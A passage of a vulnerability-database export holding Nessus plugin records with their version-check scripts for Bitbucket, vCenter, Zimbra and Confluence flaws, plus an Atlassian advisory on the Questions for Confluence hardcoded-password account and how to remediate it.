value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:bitbucket\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI 
abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bitbucket_detect.nbin\");\n script_require_keys(\"installed_sw/bitbucket\");\n script_require_ports(\"Services/www\", 7990);\n\n exit(0);\n}\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:7990);\n\nvar app = 'bitbucket';\n\nvar app_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { 'min_version' : '7.0.0', 'fixed_version' : '7.6.17' },\n { 'min_version' : '7.7.0', 'fixed_version' : '7.17.10' },\n { 'min_version' : '7.18.0', 'fixed_version' : '7.21.4' },\n { 'min_version' : '8.0.0', 'fixed_version' : '8.0.3' },\n { 'min_version' : '8.1.0', 'fixed_version' : '8.1.3' },\n { 'min_version' : '8.2.0', 'fixed_version' : '8.2.2' },\n { 'min_version' : '8.3.0', 'fixed_version' : '8.3.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-06T12:50:46", "description": "The version of Atlassian Bitbucket installed on the remote host is allows remote attackers with read permissions to a public or private Bitbucket repository to execute code by sending a malicious HTTP request.", "cvss3": {}, "published": "2023-02-09T00:00:00", "type": "nessus", "title": "Atlassian Bitbucket RCE (CVE-2022-36804)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:atlassian:bitbucket"], "id": "BITBUCKET_CVE-2022-36804.NBIN", "href": "https://www.tenable.com/plugins/nessus/171253", "sourceData": "Binary data bitbucket_cve-2022-36804.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:21:15", "description": "An arbitrary file upload vulnerability exists in vCenter Server. 
An unauthenticated, remote attacker with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.", "cvss3": {}, "published": "2021-10-06T00:00:00", "type": "nessus", "title": "VMware vCenter Server Arbitrary File Upload (VMSA-2021-0020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-22005.NBIN", "href": "https://www.tenable.com/plugins/nessus/153889", "sourceData": "Binary data vmware_vcenter_cve-2021-22005.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-01T14:22:53", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {}, "published": "2021-02-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server RCE (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21972.NBIN", "href": "https://www.tenable.com/plugins/nessus/146825", "sourceData": "Binary data vmware_vcenter_cve-2021-21972.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:34:10", "description": "According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities, including the following:\n\n - An issue was discovered in ProxyServlet.java in the /proxy servlet in Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0. 
The value of the X-Forwarded-Host header overwrites the value of the Host header in proxied requests. The value of X-Forwarded-Host header is not checked against the whitelist of hosts that ZCS is allowed to proxy to (the zimbraProxyAllowedDomains setting). (CVE-2022-37041)\n\n - Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925. (CVE-2022-37042)\n\n - An issue was discovered in the webmail component in Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0. When using preauth, CSRF tokens are not checked on some POST endpoints. Thus, when an authenticated user views an attacker-controlled page, a request will be sent to the application that appears to be intended. The CSRF token is omitted from the request, but the request still succeeds. 
(CVE-2022-37043)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-23T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 33 / 9.0.0 < 9.0.0 Patch 26 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2068", "CVE-2022-24407", "CVE-2022-27925", "CVE-2022-37041", "CVE-2022-37042", "CVE-2022-37043"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_9_0_0_P26.NASL", "href": "https://www.tenable.com/plugins/nessus/164341", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164341);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\n \"CVE-2022-2068\",\n \"CVE-2022-24407\",\n \"CVE-2022-37041\",\n \"CVE-2022-37042\",\n \"CVE-2022-37043\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 33 / 9.0.0 < 9.0.0 Patch 26 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities,\nincluding the following:\n\n - An issue was discovered in ProxyServlet.java in the /proxy servlet in Zimbra Collaboration Suite (ZCS)\n 8.8.15 and 9.0. The value of the X-Forwarded-Host header overwrites the value of the Host header in\n proxied requests. 
The value of X-Forwarded-Host header is not checked against the whitelist of hosts that\n ZCS is allowed to proxy to (the zimbraProxyAllowedDomains setting). (CVE-2022-37041)\n\n - Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive\n and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can\n upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this\n issue exists because of an incomplete fix for CVE-2022-27925. (CVE-2022-37042)\n\n - An issue was discovered in the webmail component in Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0. When\n using preauth, CSRF tokens are not checked on some POST endpoints. Thus, when an authenticated user views\n an attacker-controlled page, a request will be sent to the application that appears to be intended. The\n CSRF token is omitted from the request, but the request still succeeds. (CVE-2022-37043)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Security_Center\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cisa.gov/uscert/ncas/alerts/aa22-228a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.8.15 Patch 33, 9.0.0 Patch 26, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2068\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-37042\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zimbra:collaboration_suite\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\", \"zimbra_nix_installed.nbin\");\n script_require_keys(\"installed_sw/zimbra_zcs\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::zimbra::combined_get_app_info();\n\nvar constraints = [\n {'min_version':'8.8', 'max_version':'8.8.15', 'fixed_display':'8.8.15 Patch 33', 'Patch':'33'},\n {'min_version':'9.0', 'max_version':'9.0.0', 'fixed_display':'9.0.0 Patch 26', 'Patch':'26'}\n];\n\nvcf::zimbra::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xsrf':TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T20:34:33", "description": "According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities, including the following:\n\n - A vulnerability that allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached entries. (CVE-2022-27924)\n\n - Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal. (CVE-2022-27925)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. 
(CVE-2021-39275)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-13T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 31 / 9.0.0 < 9.0.0 Patch 24 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21702", "CVE-2021-39275", "CVE-2021-40438", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-27926"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_9_0_0_P24.NASL", "href": "https://www.tenable.com/plugins/nessus/163072", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163072);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21702\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2022-27924\",\n \"CVE-2022-27925\",\n \"CVE-2022-27926\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/04/24\");\n script_xref(name:\"IAVA\", value:\"2022-A-0268-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 31 / 9.0.0 < 9.0.0 Patch 24 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities,\nincluding the following:\n\n - A vulnerability that allows an unauthenticated attacker to inject arbitrary 
memcache commands into a\n targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached\n entries. (CVE-2022-27924)\n\n - Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and\n extracts files from it. An authenticated user with administrator rights has the ability to upload\n arbitrary files to the system, leading to directory traversal. (CVE-2022-27925)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Security_Center\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.8.15 Patch 31, 9.0.0 Patch 24, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-39275\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zimbra:collaboration_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\", \"zimbra_nix_installed.nbin\");\n script_require_keys(\"installed_sw/zimbra_zcs\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::zimbra::combined_get_app_info();\n\nvar constraints = [\n {'min_version':'8.8', 'max_version':'8.8.15', 'fixed_display':'8.8.15 Patch 31', 'Patch':'31'},\n {'min_version':'9.0', 'max_version':'9.0.0', 'fixed_display':'9.0.0 Patch 24', 'Patch':'24'}\n];\n\nvcf::zimbra::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:40:01", "description": "According to its self-reported version number, the Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-01-04T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CONFSERVER-79016)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-07T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "ATLASSIAN_CONFLUENCE_CONFSERVER-79016.NASL", "href": "https://www.tenable.com/plugins/nessus/169509", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(169509);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/07\");\n\n script_cve_id(\"CVE-2022-26134\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/06\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0023\");\n\n script_name(english:\"Atlassian Confluence Command Injection (CONFSERVER-79016)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a command injection\nvulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence running\non the remote host is affected by a command injection vulnerability. A remote,\nunauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on\nthe application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-79016\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1df4fa0\");\n # https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5cd914cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Namespace OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/01/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_win_installed.nbin\", \"confluence_nix_installed.nbin\", \"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/Atlassian Confluence\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_name = 'Atlassian Confluence';\n\nvar app_info = vcf::combined_get_app_info(app:app_name);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n {\"min_version\": \"1.3.0\", \"fixed_version\": \"7.4.17\", \"fixed_display\": \"7.4.17 / 7.18.1\"},\n {\"min_version\": \"7.5.0\", \"fixed_version\": \"7.13.7\", \"fixed_display\": \"7.13.7 / 7.18.1\"},\n {\"min_version\": \"7.14.0\", \"fixed_version\": \"7.14.3\", \"fixed_display\": \"7.14.3 / 7.18.1\"},\n {\"min_version\": \"7.15.0\", \"fixed_version\": \"7.15.2\", \"fixed_display\": \"7.15.2 / 7.18.1\"},\n {\"min_version\": \"7.16.0\", \"fixed_version\": \"7.16.4\", \"fixed_display\": \"7.16.4 / 7.18.1\"},\n {\"min_version\": \"7.17.0\", \"fixed_version\": \"7.17.4\", \"fixed_display\": \"7.17.4 / 7.18.1\"},\n {\"min_version\": \"7.18.0\", \"fixed_version\": \"7.18.1\", \"fixed_display\": \"7.18.1\"}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "atlassian": [{"lastseen": "2023-06-06T15:36:37", "description": "(i) *Update:* This advisory has been updated since its original publication.\r\n\r\n2022/08/01 12:00 PM PDT (Pacific Time, -7 hours)\r\n * {color:#172b4d}Updated the\u00a0_Remediation_ section to note that if the {{disabledsystemuser}} account is manually deleted, the app must also be updated or uninstalled to ensure the account does not get recreated{color}\r\n\r\n2022/08/01 11:00 AM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Summary of Vulnerability_ section to note the email service provider for the {{dontdeletethisuser@email.com}}\u00a0account has confirmed the account has been 
blocked\u00a0\r\n\r\n2022/07/30 1:15 PM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Summary of Vulnerability_ section to note that instances that have not remediated this vulnerability per the\u00a0_Remediation_ section below may send email notifications from Confluence to a third party email address\r\n * Additional details are available in [Confluence Security Advisory 2022-07-20|https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html]\r\n\r\n2022/07/22 9:30 AM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Remediation_ section to explain only option 2 can be used for Confluence Server and Data Center instances configured to use a read-only external directory\r\n * Added a link to a page of frequently asked questions about CVE-2022-26138\r\n\r\n2022/07/21 8:30 AM PDT (Pacific Time, -7 hours)\r\n * An external party has discovered and publicly disclosed the hardcoded password on Twitter. *It is important to remediate this vulnerability on affected systems immediately.*\r\n * The Vulnerability Summary section has been updated to include this new information\r\n\r\nh3. Vulnerability Summary\r\n\r\nWhen the [Questions for Confluence app|https://marketplace.atlassian.com/apps/1211644/questions-for-confluence?hosting=server&tab=overview] is enabled on Confluence Server or Data Center, it creates a Confluence user account with the username {{{}disabledsystemuser{}}}. This account is intended to aid administrators that are migrating data from the app to Confluence Cloud. The {{disabledsystemuser}} account is created with a hardcoded password and is added to the {{confluence-users}} group, which allows viewing and editing all non-restricted pages within Confluence [by default|https://confluence.atlassian.com/doc/confluence-groups-139478.html]. 
A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence.\r\n\r\nThe {{disabledsystemuser}} account is configured with a third party email address ({{{}dontdeletethisuser@email.com{}}}) that is not controlled by Atlassian. If this vulnerability has not been remediated per the _Fixes_\u00a0section below, an affected instance\u00a0configured\u00a0to send\u00a0[notifications|https://confluence.atlassian.com/doc/email-notifications-145162.html]\u00a0will email that address.\u00a0One example\u00a0of an email notification is\u00a0[Recommended Updates Notifications|https://confluence.atlassian.com/doc/configuring-the-recommended-updates-email-notification-281480712.html], which contains a report of the top pages from Confluence spaces the user has permissions to view. mail.com, the free email provider that manages the {{dontdeletethisuser@email.com}}\u00a0account, has confirmed to Atlassian that the account has been blocked. This means it cannot be accessed by anyone unauthorized and cannot send or receive any new messages.\r\n\r\n(!) An external party has discovered and publicly disclosed the hardcoded password on Twitter. Refer to the _Remediation_ section below for guidance on how to remediate this vulnerability.\r\nh3. How To Determine If You Are Affected\r\n\r\nA Confluence Server or Data Center instance is affected if it has an active user account with the following information:\r\n * User: {{disabledsystemuser}}\r\n * Username: {{disabledsystemuser}}\r\n * Email: {{dontdeletethisuser@email.com}}\r\n\r\nIf this account does not show up in the list of active users, the Confluence instance is not affected.\r\nh3. Remediation\r\n\r\n(!) Uninstalling the Questions for Confluence app does *not* remediate this vulnerability. The {{disabledsystemuser}} account does not automatically get removed after the app has been uninstalled. 
If you have verified a Confluence Server or Data Center instance is affected, two equally effective ways to remediate this vulnerability are listed below. (!)\r\nh4. Option 1: Update to a non-vulnerable version of Questions for Confluence\r\n\r\nUpdate the Questions for Confluence app to a fixed version:\r\n * 2.7.x >= 2.7.38\r\n * Versions >= 3.0.5\r\n\r\nFor more information on how to update an app, refer to [Atlassian's documentation|https://confluence.atlassian.com/upm/updating-apps-273875710.html].\r\n\r\nFixed versions of the Questions for Confluence app stop creating the {{disabledsystemuser}} user account, and remove it from the system if it has already been created. Migrating data from the app to Confluence Cloud is now a manual process.\r\n\r\n(!) If Confluence is configured to use a read-only external directory (e.g. Atlassian Crowd), you will need to follow Option 2 below.\r\nh4. Option 2: Disable or delete the {{disabledsystemuser}} account\r\n\r\nSearch for the {{disabledsystemuser}} account and either disable it or delete it. For instructions on how to disable or delete an account (including an explanation of the differences between the two options), refer to [Atlassian's documentation|https://confluence.atlassian.com/doc/delete-or-disable-users-138318.html].\r\n\r\nIf you choose to delete the {{disabledsystemuser}} account, you must also [uninstall|https://confluence.atlassian.com/upm/uninstalling-apps-273875709.html] or upgrade the Questions for Confluence app to a non-vulnerable version. *Failure to do this could result in the account being recreated after it has been deleted.*\r\n\r\nIf Confluence is configured to use a read-only external directory, refer to the [Delete from a read-only external directory, or multiple external directories section|https://confluence.atlassian.com/doc/delete-or-disable-users-138318.html#DeleteorDisableUsers-Deletefromaread-onlyexternaldirectory,ormultipleexternaldirectories]\u00a0from the same document\r\nh3. 
Frequently Asked Questions\r\n\r\nWe'll update the\u00a0[FAQ for CVE-2022-26138|https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html]\u00a0with answers for commonly asked questions.\r\nh3. Security Advisory\r\n\r\nFor additional details, refer to [Confluence Security Advisory 2022-07-20|https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html].\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T17:06:14", "type": "atlassian", "title": "Questions For Confluence App - Hardcoded Password", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2023-02-21T15:41:00", "id": "CONFSERVER-79483", "href": "https://jira.atlassian.com/browse/CONFSERVER-79483", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:43:22", "description": "h3. Command injection vulnerability through malicious HTTP requests\r\n\r\nThere is a command injection vulnerability in multiple API endpoints of Bitbucket Server and Data Center. 
